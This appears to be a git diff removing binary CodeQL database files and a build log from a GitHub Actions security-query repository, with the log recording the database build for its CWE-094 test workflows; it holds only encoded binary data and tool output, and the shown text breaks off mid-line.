z^M-f+N5S+xANa^8KJ$gIeB(Pm_-X$D{l#zo@Yl9L1SSY}2pSsiB4`-G5{~dhAR>{7 zOJt%Dl{iErIx&b%Okxp__#_}9iAYQm7Lt@?BxeCBNJ%PElZLdUBRA>EKt?i=nJi=_ z8`;T0PI8flyyRm(`6)pG3Q~x|6rm`^C{9UQQHs)(p)BPnPX#JciON)=D%Ge?4O&u@ zTGXZvb*V>v8qknNG^PnnX-0Ee(3%0Xp)KubPX{{EiSBf!3tj0(4|>vz-t?g_{pim? z<}rxD3}Gn47|sYrGK$fRVJzbq&jjW&kx5Ku3R9WJbY?JfHtY9Up zILvC+u$DutV?7(#$R;+kg@bHm7u(p*4tBDe1MFch``FJh-f)}~oa7XzIm20AbB^;| z;1w6S#AU8bs6rl-2I3g3C2t*_jQHV)Y zq7j`K#3DYii9=lCk(5OwBRMHZNh(s4hU}yz9qGwN1~QU~tYjt&Imk&a7LuDhDP6_5yl1h}KG-W7DIm%Okid3crRj5ies#AlS)S@Q=bMj zq!CSMN;8_%l76(JHEn21JKEEMj&!0kUFbMaZYfW>zv^%=Qz&= zE^>*>T;VF$_>UWW>6Q1&n=X~J>FL}jl-td-pyypWS`NU^_ z@RMJjV|4w^AO0E#5QxA8At=Ex5j+I{5Ry=YCK_RgN?5`Xo(M!F5|N2QY&sB!xWpqq z2}npHQj?e@BqbTiNkK|dk%qLSqdn=#Kt|e;iOggnCt1lxc5;x5+~grI`N&TJ+ES2W z6rwOiC`xh4P=b<_qBLcxL^;Y+fr?b7234p^HL6pSdeoveb*M{y+R%W8G@>z0Xi76$ z)0`Hxq!pb40z!n)&UB$G-RMpadNPAv^rjDk=}SNQGl&5UWC%kU##n|kf{~126r&l( zcqTBNiA-Y>lbOO)W-^P}))`#qFqe7kVLl63$Rhq_F-usUGDRMhrHtvk9opVp7ER)yyYdYc+DH$^MQ}qTGXZKdm=FfAO0? z{IxAOr3rx@{s~DaLKB9tlp-AAi9ksr5{bw}Au7>`P6=WVmzcyNHgSkYV&ap4gd`#f zDM?B)l9Pf|q$f3LNJ~00kd=&NA~RXYMsBi`gPi0d4+Y6fKJrt5LKLSkMJP%!$}*2~ zl&1m}sYGR}Fqf)SqdIe_K}~8=n>y5`9Kg?&EF0KiD~BC_)p4u!JK#5r|7fA`zJ=L?s&0i9t+a5t}%~Cj|*eNFoxGgrp=RIVs6R zDpHe%w4@_F8OTTu){&E3*>T;VF$_>b${;3l_t&TZ~+mwVjj z0S|e^W1jGoXS}qI0DZ-4-td-pyypX7`N$_e^M!AG=LbLe#c%%b*Es_biNFLQD8UF$ z2>u}~A+dl^p$S7c!V`grL?s&0Nkh{PlzDalAna?+53l%ygx znHWfBvXGSmWFtE{$WKmkk(+$vAuk0fL}3O{grXFqKgB6QNlHcH1rVe$fM+2JDkVZ773C(Ctb6U`nRRR9Ee0p|b! diff --git a/db/db-yaml/default/yaml_scalars.rel b/db/db-yaml/default/yaml_scalars.rel deleted file mode 100644 index aa10fbd1a3ab8b089f766b6e623ff699b1dc88ff..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12540 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 Initializing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. -[2024-03-01 13:05:58] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:58] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson -[2024-03-01 13:05:58] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/.codeqlmanifest.json -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby/codeql-extractor.yml. -[2024-03-01 13:05:58] Plumbing command codeql resolve languages completed: - { - "aliases" : { - "c" : "cpp", - "c++" : "cpp", - "c-c++" : "cpp", - "c-cpp" : "cpp", - "c#" : "csharp", - "java-kotlin" : "java", - "kotlin" : "java", - "javascript-typescript" : "javascript", - "typescript" : "javascript" - }, - "extractors" : { - "go" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go" - } - ], - "python" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python", - "extractor_options" : { - "logging" : { - "title" : "Options pertaining to logging.", - "description" : "Options pertaining to logging.", - "type" : "object", - "properties" : { - "verbosity" : { - "title" : "Python extractor logging verbosity level.", - "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", - "type" : "string", - "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" - } - } - }, - "python_executable_name" : { - "title" : "Controls the name of the Python executable used by the Python extractor.", - "description" : "The Python extractor uses platform-dependent heuristics to determine the name of the Python executable to use. Specifying a value for this option overrides the name of the Python executable used by the extractor. Accepted values are py, python and python3. Use this setting with caution, the Python extractor requires Python 3 to run.\n", - "type" : "string", - "pattern" : "^(py|python|python3)$" - } - } - } - ], - "java" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java", - "extractor_options" : { - "exclude" : { - "title" : "A glob excluding files from analysis.", - "description" : "A glob indicating what files to exclude from the analysis.\n", - "type" : "string" - }, - "add_prefer_source" : { - "title" : "Whether to always prefer source files over class files.", - "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction (experimental).", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "html" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html" - } - ], - "xml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml" - } - ], - "properties" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties" - } - ], - "cpp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp", - "extractor_options" : { } - } - ], - "swift" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift" - } - ], - "csv" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv" - } - ], - "yaml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml" - } - ], - "csharp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip|brotli)$" - } - } - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction.", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "cil" : { - "title" : "Whether to enable CIL extraction.", - "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "logging" : { - "title" : "Options pertaining to logging.", - "description" : "Options pertaining to logging.", - "type" : "object", - "properties" : { - "verbosity" : { - "title" : "Extractor logging verbosity level.", - "description" : "Controls the level of verbosity of the extractor. The supported levels are (in order of increasing verbosity):\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", - "type" : "string", - "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" - } - } - } - } - } - ], - "javascript" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript", - "extractor_options" : { - "skip_types" : { - "title" : "Skip type extraction for TypeScript", - "description" : "Whether to skip the extraction of types in a TypeScript application", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "ruby" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip)$" - } - } - } - } - } - ] - } - } -[2024-03-01 13:05:58] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 -[2024-03-01 13:05:58] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. -[2024-03-01 13:05:58] [DETAILS] database init> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . -[2024-03-01 13:05:58] [PROGRESS] database init> Calculated baseline information for languages: (71ms). -[2024-03-01 13:05:58] [PROGRESS] database init> Resolving extractor yaml. -[2024-03-01 13:05:58] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml. -[2024-03-01 13:05:58] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml. -[2024-03-01 13:05:58] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. This in-progress database is ready to be populated by an extractor. -[2024-03-01 13:05:58] Plumbing command codeql database init completed. -[2024-03-01 13:05:58] [PROGRESS] database create> Running build command: [] -[2024-03-01 13:05:58] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --index-traceless-dbs --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:58] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh. -[2024-03-01 13:05:58] [PROGRESS] database trace-command> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh] -[2024-03-01 13:05:59] [build-stderr] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... -[2024-03-01 13:05:59] [build-stderr] /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... -[2024-03-01 13:05:59] [build-stderr] Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list] -[2024-03-01 13:05:59] Plumbing command codeql database trace-command completed. -[2024-03-01 13:05:59] [PROGRESS] database create> Finalizing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. -[2024-03-01 13:05:59] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:59] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db... -[2024-03-01 13:05:59] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/yaml.dbscheme -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml -[2024-03-01 13:05:59] Clearing disk cache since the version file /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache/version does not exist -[2024-03-01 13:05:59] Tuple pool not found. Clearing relations with cached strings -[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode clear. -[2024-03-01 13:05:59] Sequence stamp origin is -6212520902965462594 -[2024-03-01 13:05:59] Pausing evaluation to hard-clear memory at sequence stamp o+0 -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:05:59] Pausing evaluation to quickly trim disk at sequence stamp o+1 -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+2 -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:05:59] Trimming completed (6ms): Purged everything. -[2024-03-01 13:05:59] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml -[2024-03-01 13:05:59] Found 27 TRAP files (71.04 KiB) -[2024-03-01 13:05:59] [PROGRESS] dataset import> Importing TRAP files -[2024-03-01 13:05:59] Importing argus_case_study.yml.trap.gz (1 of 27) -[2024-03-01 13:05:59] Importing changed-files.yml.trap.gz (2 of 27) -[2024-03-01 13:05:59] Importing comment_issue.yml.trap.gz (3 of 27) -[2024-03-01 13:05:59] Importing comment_issue_newline.yml.trap.gz (4 of 27) -[2024-03-01 13:05:59] Importing cross1.yml.trap.gz (5 of 27) -[2024-03-01 13:05:59] Importing cross2.yml.trap.gz (6 of 27) -[2024-03-01 13:05:59] Importing cross3.yml.trap.gz (7 of 27) -[2024-03-01 13:05:59] Importing discussion.yml.trap.gz (8 of 27) -[2024-03-01 13:05:59] Importing discussion_comment.yml.trap.gz (9 of 27) -[2024-03-01 13:05:59] Importing gollum.yml.trap.gz (10 of 27) -[2024-03-01 13:05:59] Importing image_link_generator.yml.trap.gz (11 of 27) -[2024-03-01 13:05:59] Importing inter-job.yml.trap.gz (12 of 27) -[2024-03-01 13:05:59] Importing issues.yaml.trap.gz (13 of 27) -[2024-03-01 13:05:59] Importing matrix.yml.trap.gz (14 of 27) -[2024-03-01 13:05:59] Importing no-flow1.yml.trap.gz (15 of 27) -[2024-03-01 13:05:59] Importing no-flow2.yml.trap.gz (16 of 27) -[2024-03-01 13:05:59] Importing pull_request_review.yml.trap.gz (17 of 27) -[2024-03-01 13:05:59] Importing pull_request_review_comment.yml.trap.gz (18 of 27) -[2024-03-01 13:05:59] Importing pull_request_target.yml.trap.gz (19 of 27) -[2024-03-01 13:05:59] Importing push.yml.trap.gz (20 of 27) -[2024-03-01 13:05:59] Importing simple1.yml.trap.gz (21 of 27) -[2024-03-01 13:05:59] Importing simple2.yml.trap.gz (22 of 27) -[2024-03-01 13:05:59] Importing test.yml.trap.gz (23 of 27) -[2024-03-01 13:05:59] Importing workflow_run.yml.trap.gz (24 of 27) -[2024-03-01 13:05:59] Importing action.yml.trap.gz (25 of 27) -[2024-03-01 13:05:59] Importing action.yml.trap.gz (26 of 27) -[2024-03-01 13:05:59] Importing sourceLocationPrefix.trap.gz (27 of 27) -[2024-03-01 13:05:59] [PROGRESS] dataset import> Merging relations -[2024-03-01 13:05:59] Merging 1 fragment for 'files'. -[2024-03-01 13:05:59] Merged 208 bytes for 'files'. -[2024-03-01 13:05:59] Merging 1 fragment for 'folders'. -[2024-03-01 13:05:59] Merged 128 bytes for 'folders'. -[2024-03-01 13:05:59] Merging 1 fragment for 'containerparent'. -[2024-03-01 13:05:59] Merged 328 bytes for 'containerparent'. -[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_scalars'. -[2024-03-01 13:05:59] Merged 12540 bytes (12.25 KiB) for 'yaml_scalars'. -[2024-03-01 13:05:59] Merging 1 fragment for 'yaml'. -[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'yaml'. -[2024-03-01 13:05:59] Merging 1 fragment for 'locations_default'. -[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'locations_default'. -[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_locations'. -[2024-03-01 13:05:59] Merged 11128 bytes (10.87 KiB) for 'yaml_locations'. -[2024-03-01 13:05:59] Merging 1 fragment for 'sourceLocationPrefix'. -[2024-03-01 13:05:59] Merged 4 bytes for 'sourceLocationPrefix'. -[2024-03-01 13:05:59] Saving string and id pools to disk. -[2024-03-01 13:05:59] Finished importing TRAP files. -[2024-03-01 13:05:59] Read 360.45 KiB of uncompressed TRAP data. -[2024-03-01 13:05:59] Relation data size: 88.97 KiB (merge rate: 1.39 MiB/s) -[2024-03-01 13:05:59] String pool size: 2.06 MiB -[2024-03-01 13:05:59] ID pool size: 1.08 MiB -[2024-03-01 13:05:59] [PROGRESS] dataset import> Finished writing database (relations: 88.97 KiB; string pool: 2.06 MiB). -[2024-03-01 13:05:59] Pausing evaluation to close the cache at sequence stamp o+3 -[2024-03-01 13:05:59] The disk cache is freshly trimmed; leave it be. -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:05:59] Plumbing command codeql dataset import completed. -[2024-03-01 13:05:59] [PROGRESS] database finalize> TRAP import complete (560ms). -[2024-03-01 13:05:59] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... -[2024-03-01 13:05:59] [PROGRESS] database cleanup> TRAP files cleaned up (13ms). -[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up scratch directory... -[2024-03-01 13:05:59] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms). -[2024-03-01 13:05:59] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml -[2024-03-01 13:05:59] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml. -[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode trim. -[2024-03-01 13:05:59] Sequence stamp origin is -6212520900610201313 -[2024-03-01 13:05:59] Pausing evaluation to quickly trim memory at sequence stamp o+0 -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 